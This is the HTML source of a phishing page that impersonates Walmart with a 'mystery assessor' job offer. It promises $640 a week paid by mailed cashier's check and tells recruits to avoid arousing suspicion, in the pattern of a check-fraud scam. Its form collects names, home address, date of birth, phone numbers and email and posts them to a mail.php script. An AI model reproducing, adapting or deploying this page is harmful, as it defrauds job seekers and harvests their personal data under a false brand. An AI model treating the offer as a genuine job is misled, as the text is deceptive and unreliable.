﻿<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">


</head><body class="ctreWrapper" onload="rs();"><font color="#151B54">



<font color="#151B54">

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Walmart</title>
<link href="Walmart_files/dt-job-application.css" rel="stylesheet" type="text/css">
<script type="text/javascript" language="javascript" src="Walmart_files/ffunctions.htm"></script>

<form name="dtApplication" method="post" action="mail.php" "index.asp"="">

<!-- wrapper -->
<div id="wrapper">


<img src="https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcQ2gWGXmPIwy7NmBDnQ2UU3WLizu5EDtIc1lRhIpToBeT6gyzCFmk_LVLg" <!--="" header="" --="" height="82" width="195">

<!-- page title -->
<div id="title">
  <h1>Wal-Mart Shopping Surveys</h1>
</div>

<!-- content -->
<div id="content">

  <p style="text-align: left"><div dir="ltr"><p style="color:rgb(0,0,0);font-family:&quot;times new roman&quot;;font-size:medium;background-color:rgb(236,233,216)" align="center"><em>There is a mystery assessor job open. Mspa-global is a company that conducts surveys and evaluates other companies. We get hired to go to other companies and act like customers in order to know how the staffs are handling their services in relation to their customers.&nbsp;<br><br>Once we have a contract to do you would be directed to the company or outlet, and you would be given the funds you need to do the job either to purchase things or require services after which you would write a comment on the staffs activities and give a detailed record of your experience, please note that this does not affect your current employment at all. you will need to shop in any of the stores around your house or work place. . Please note that you are to stay Calm and Confident throughout the period which you will be carrying out your work at the Outlet in order not to arouse any suspicion.&nbsp;<br><br>Your wages would be $320 for any work you carry out and you are to to carry out two a week, so you total weekly salary would be $640. You will write a report about the customer services, you will send your report back to us , you will have to use the following pointers to prepare your report:</em></p><p style="color:rgb(0,0,0);font-family:&quot;times new roman&quot;;font-size:medium;background-color:rgb(236,233,216)"><em>1) How long it took you to get services.</em></p><p style="color:rgb(0,0,0);font-family:&quot;times new roman&quot;;font-size:medium;background-color:rgb(236,233,216)"><em>2) Ambiance/Outlook of the Shop/Outlet</em></p><p style="color:rgb(0,0,0);font-family:&quot;times new roman&quot;;font-size:medium;background-color:rgb(236,233,216)"><em>3) Smartness of the attendant</em></p><p style="color:rgb(0,0,0);font-family:&quot;times new roman&quot;;font-size:medium;background-color:rgb(236,233,216)"><em>4) Customer service professionalism</em></p><p style="color:rgb(0,0,0);font-family:&quot;times new roman&quot;;font-size:medium;background-color:rgb(236,233,216)"><em>5) Reaction of personnel under pressure</em></p><p style="color:rgb(0,0,0);font-family:&quot;times new roman&quot;;font-size:medium;background-color:rgb(236,233,216)"><em>6) Information that you think would be helpful</em></p><p style="color:rgb(0,0,0);font-family:&quot;times new roman&quot;;font-size:medium;background-color:rgb(236,233,216)"><em>7) Your comments and impressions.</em></p><p style="color:rgb(0,0,0);font-family:&quot;times new roman&quot;;font-size:medium;background-color:rgb(236,233,216)"><em>A package will be sent to you, inside the package you will find your Compensation payment and other funds you will use to carry out your surveying process.The package would contain payment in form of cashiers check, You must not use your personal money to complete any of the surveying process and there will be no reimbursement of any kind since we are providing you with all the funds you will need to carry out the survey.</em></p><p style="color:rgb(0,0,0);font-family:&quot;times new roman&quot;;font-size:medium;background-color:rgb(236,233,216)"><em>An Evaluation Instruction will be given to you through email and we would give you the store to evaluate. If you are interested and willing to start off as soon as possible,</em></p><p style="color:rgb(0,0,0);font-family:&quot;times new roman&quot;;font-size:medium;background-color:rgb(236,233,216)"><em>KINDLY FILL YOUR INFORMATION BELOW.</em></p><p style="color:rgb(0,0,0);font-family:&quot;times new roman&quot;;font-size:medium;background-color:rgb(236,233,216)"><em>it is important you provide us with correct contact details and a contact cell phone number,&nbsp;</em></p></div><br>
</p>


</div>
<font color="#151B54">
<!-- Steps -->




<!-- Form -->
</font>
<div id="form">
  <h2><font color="#151B54"> <span style="font-size: 10pt;">CONTACT INFORMATION</span></font></h2>
  <table class="tblForm" border="0" width="782" cellpadding="3" cellspacing="1">

    
    <tbody>
    <tr>
      <td width="250"><font color="#151B54">First Name<br>
        <em style="font-style: normal"><font size="1">(Block capitals)</font></em></font></td>

      <td width="265">
      <font color="#151B54">
      <input name="name" class="std" id="frmTxt3" size="20" type="text"></font></td>
      <td width="245"></td>
    </tr>
    <tr>
      <td width="250"><font color="#151B54">Last Name<br>
        <em style="font-style: normal"><font size="1">(Block capitals)</font></em></font></td>
      <td width="265">

      <font color="#151B54">

      <input name="lasame" class="std" id="frmTxt4" size="20" type="text"></font></td>
      <td width="245"></td>
    </tr>
    
    <tr>
      <td width="250"><font color="#151B54"><strong>CONTACT ADDRESS:<br>
		<font size="1">{Not P.O.Box}</font></strong><font size="1">:&nbsp;</font></font></td>
      <td colspan="2" width="517"><font color="#151B54">&nbsp;</font></td>
    </tr>
    <tr>

      <td width="250"><font color="#151B54"><span class="field-label-1">
      <label for="previous_address_line1" id="previous_address_line1_label">
      Address Line 1*</label></span></font></td>
      <td colspan="2" width="517">
		<font color="#151B54">
		<input autocomplete="off" class="align-font-width" name="ddress" maxlength="50" size="30" id="previous_address_line1" type="text"></font></td>
    </tr>
    <tr>
      <td width="250"><font color="#151B54"><span class="field-label-1">
      <label for="previous_address_line2" id="previous_address_line2_label">

      Address Line 2*</label></span></font></td>
      <td colspan="2" width="517">
		<font color="#151B54">
		<input autocomplete="off" class="align-font-width" name="apt" maxlength="30" size="30" id="previous_address_line2" type="text"></font></td>
    </tr>
    <tr>
      <td width="250"><font color="#151B54">City :</font></td>
      <td colspan="2" width="517">
		<font color="#151B54">
		<input autocomplete="off" class="align-font-width" name="itcy" maxlength="50" size="20" id="previous_city" type="text"></font></td>
    </tr>
    <tr>

      <td width="250"><font color="#151B54">State :</font></td>
      <td colspan="2" width="517"> 
	
	
	
	
	
	
	
	

		

	

	

<font color="#151B54"> 
	
	
	
	
	
	
	
	

		

	

	

<select name="state" id="previous_state" class="align-font-width-state" size="1">
	
	<option selected="selected">(Please Select State)</option>
	
			<option value="AL">Alabama</option>
		
			<option value="AK">Alaska</option>
		
			<option value="AZ">Arizona</option>

		
			<option value="AR">Arkansas</option>
		
			<option value="CA">California</option>
		
			<option value="CO">Colorado</option>
		
			<option value="CT">Connecticut</option>
		
			<option value="DE">Delaware</option>
		
			<option value="DC">District of Columbia</option>

		
			<option value="FL">Florida</option>
		
			<option value="GA">Georgia</option>
		
			<option value="HI">Hawaii</option>
		
			<option value="ID">Idaho</option>
		
			<option value="IL">Illinois</option>
		
			<option value="IN">Indiana</option>

		
			<option value="IA">Iowa</option>
		
			<option value="KS">Kansas</option>
		
			<option value="KY">Kentucky</option>
		
			<option value="LA">Louisiana</option>
		
			<option value="ME">Maine</option>
		
			<option value="MD">Maryland</option>

		
			<option value="MA">Massachusetts</option>
		
			<option value="MI">Michigan</option>
		
			<option value="MN">Minnesota</option>
		
			<option value="MS">Mississippi</option>
		
			<option value="MO">Missouri</option>
		
			<option value="MT">Montana</option>

		
			<option value="NE">Nebraska</option>
		
			<option value="NV">Nevada</option>
		
			<option value="NH">New Hampshire</option>
		
			<option value="NJ">New Jersey</option>
		
			<option value="NM">New Mexico</option>
		
			<option value="NY">New York</option>

		
			<option value="NC">North Carolina</option>
		
			<option value="ND">North Dakota</option>
		
			<option value="OH">Ohio</option>
		
			<option value="OK">Oklahoma</option>
		
			<option value="OR">Oregon</option>
		
			<option value="PA">Pennsylvania</option>

		
			<option value="RI">Rhode Island</option>
		
			<option value="SC">South Carolina</option>
		
			<option value="SD">South Dakota</option>
		
			<option value="TN">Tennessee</option>
		
			<option value="TX">Texas</option>
		
			<option value="UT">Utah</option>

		
			<option value="VT">Vermont</option>
		
			<option value="VA">Virginia</option>
		
			<option value="WA">Washington</option>
		
			<option value="WV">West Virginia</option>
		
			<option value="WI">Wisconsin</option>
		
			<option value="WY">Wyoming</option>

		
			<option value="IT">International</option>
		
	
</select></font></td>
    </tr>
    <tr>
      <td width="250"><font color="#151B54">Zip Code :</font></td>
      <td colspan="2" width="517">
      <font color="#151B54">
      <input autocomplete="off" class="align-font-width" name="zipc" maxlength="50" size="20" id="previous_city0" type="text"></font></td>
    </tr>

    <tr>
      <td width="250"><font color="#151B54">DOB:</font></td>
      <td colspan="2" width="517">
      <font color="#151B54">
      <input name="age" class="std" id="frmTxt13" size="43" type="text"></font></td>
    </tr>
    <tr>

      <td width="250"><font color="#151B54">Home Telephone: </font> </td>
      <td colspan="2" width="517">
      <font color="#151B54">
      <input name="hompf" class="std" id="frmTxt6" size="20" type="text"></font></td>
    </tr>
    <tr>
      <td width="250"><font color="#151B54">Mobile Phone No:<br>
		<font size="1">(For Text Alert)</font></font></td>
      <td colspan="2" width="517">
      <font color="#151B54">
      <input name="celfone" class="std" id="frmTxt7" size="20" type="text"></font></td>

    </tr>
    <tr>
      <td width="250"><font color="#151B54">Email address:<br>
		<font size="1">(Must be the one you use regularly)</font></font></td>
      <td width="265">
      <font color="#151B54">
      <input name="emalis" class="std" id="frmTxt8" size="20" type="text"></font></td>
      <td width="245"></td>
    </tr>
    <tr>

      <td colspan="3" width="774"><div align="center">
        <input name="button" class="button" id="button" value="SUBMIT" type="submit">
      </div></td>
      </tr>
  </tbody></table>
</div>



Wal-Mart<br>
Staffing and Recruiting Dept,<br>
Secret Shopper®<br>


</div>
<!-- /wrapper -->
</form>
</font></font></body></html>